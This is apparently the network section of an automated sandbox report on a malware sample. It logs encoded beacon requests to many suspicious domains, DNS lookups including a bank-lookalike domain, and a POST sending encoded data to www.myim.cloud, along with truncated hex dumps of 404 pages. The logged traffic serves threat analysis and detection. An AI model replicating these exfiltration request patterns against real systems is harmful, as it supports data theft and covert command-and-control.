            Source: global traffic | HTTP traffic detected: GET /p6o9/?Qd=Zmr/YL1wBhH5EvOYa+lfR7FMwZSqpeTcexp1DhQNUfR7ECek+Jud5GyO11J5h9itVrdZedwNG4+zKYxY7NG/xiBUzJxWpUvsREBgoFXOyFDTB09pGlr6B+k=&0z=mDcdcR8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.qiluqiyuan.buzzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /45sz/?0z=mDcdcR8&Qd=wkQ2jmS8yMxgRlKbDRWyNF0e8S7IapgV39hMR0do1D6sDTDom055RMGGVlZFQUvdDVO+pgeKf5JaLn1AK40x9uDDBeomzG9S18EgEY/2fSLTGleisJLGxPY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.omexai.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /yzen/?Qd=O9V9WpJA2Id3CQ8eXizaOlP9WjrM4aluQNnrI8f3VjqE97lt7JSCdbE8JrYB0ARmCvuQ5PpqBCp66EiUa7dY6YydUJ+eQOaY3qqiNVkH5/URE6MIj12/bE0=&0z=mDcdcR8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.dfbio.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /cent/?0z=mDcdcR8&Qd=l1qN2MMhbl/x2ijL+cYxGoEcoDCmCINS+YU1HxWhb8Kqe535lkNGafx30NgxGLIJJEStArUmzXIrZ0bzKO7vv1M79bDO++JJrrxc/WvjehfCDuj8XmxnNRs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.healthsolutions.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /gxi9/?Qd=Ur1yZ7cx/WDhKbJaAn0jkNNLDG3pddkDLNR9jSxILeo8Td4MSncFddMj031fez90w2sTSD8IzMd3myhBgMNGmZp5Mlx2w1QvKSGogY0wmO8HURKJraqBGaM=&0z=mDcdcR8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.golbasi-nakliyat.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /ibl4/?Qd=JoaaHegl6i+0bHLuLd264Bxd28Hb6zIn2a9w13HpkUvWqM8iIVBE+LpbDbn5e+5yif/ulpJxYQTtoLoBamVQ2AU3CZID6kvfd7ZL4Wu9CurbADaEbfhMIYo=&0z=mDcdcR8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.begumnasreenbano.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global traffic | DNS traffic detected: DNS query: www.clientebradesco.online
            Source: global traffic | DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
            Source: global traffic | DNS traffic detected: DNS query: www.myim.cloud
            Source: global traffic | DNS traffic detected: DNS query: www.d55dg.top
            Source: global traffic | DNS traffic detected: DNS query: www.arlon-commerce.com
            Source: global traffic | DNS traffic detected: DNS query: www.fineg.online
            Source: global traffic | DNS traffic detected: DNS query: www.asian-massage-us.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.thriveline.online
            Source: global traffic | DNS traffic detected: DNS query: www.aflaksokna.com
            Source: global traffic | DNS traffic detected: DNS query: www.esistiliya.online
            Source: global traffic | DNS traffic detected: DNS query: www.qiluqiyuan.buzz
            Source: global traffic | DNS traffic detected: DNS query: www.omexai.info
            Source: global traffic | DNS traffic detected: DNS query: www.dfbio.net
            Source: global traffic | DNS traffic detected: DNS query: www.healthsolutions.top
            Source: global traffic | DNS traffic detected: DNS query: www.950021.com
            Source: global traffic | DNS traffic detected: DNS query: www.golbasi-nakliyat.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.begumnasreenbano.com
            Source: unknown | HTTP traffic detected: POST /12ts/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usConnection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 199Host: www.myim.cloudOrigin: http://www.myim.cloudReferer: http://www.myim.cloud/12ts/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36Data Raw: 51 64 3d 53 49 63 7a 6f 69 6f 46 65 45 79 56 62 51 39 67 56 68 57 45 54 6a 2f 44 65 48 31 73 63 6e 64 34 69 4d 45 48 7a 73 4e 64 52 65 38 6a 46 7a 55 46 42 2f 77 55 5a 57 38 52 6a 6f 30 38 38 55 68 34 36 30 4b 67 73 32 39 38 68 39 67 6f 7a 43 73 65 69 32 4f 6b 42 5a 5a 71 69 71 6f 49 48 71 65 69 77 77 6e 31 6f 44 46 51 35 51 70 70 4c 4b 67 42 66 64 42 32 64 78 51 68 7a 44 56 6f 36 31 6b 56 42 68 76 32 71 56 52 65 67 4e 6a 6b 66 36 4e 58 4f 2f 6c 56 37 69 6b 6d 62 4f 55 4d 52 74 39 2f 51 51 2f 65 32 4f 75 31 73 71 4c 34 32 73 44 31 4d 4c 79 72 68 61 32 44 70 76 78 6f 4f 44 46 5a 32 51 3d 3d Data Ascii: Qd=SIczoioFeEyVbQ9gVhWETj/DeH1scnd4iMEHzsNdRe8jFzUFB/wUZW8Rjo088Uh460Kgs298h9gozCsei2OkBZZqiqoIHqeiwwn1oDFQ5QppLKgBfdB2dxQhzDVo61kVBhv2qVRegNjkf6NXO/lV7ikmbOUMRt9/QQ/e2Ou1sqL42sD1MLyrha2DpvxoODFZ2Q==
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 08:44:01 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "668fe68e-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 08:44:04 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "668fe68e-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 08:44:06 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "668fe68e-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 08:44:09 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "668fe68e-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 08:44:28 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 
22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 08:44:30 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 
22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 08:44:33 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 
22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 08:44:36 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 
77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 08:45:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 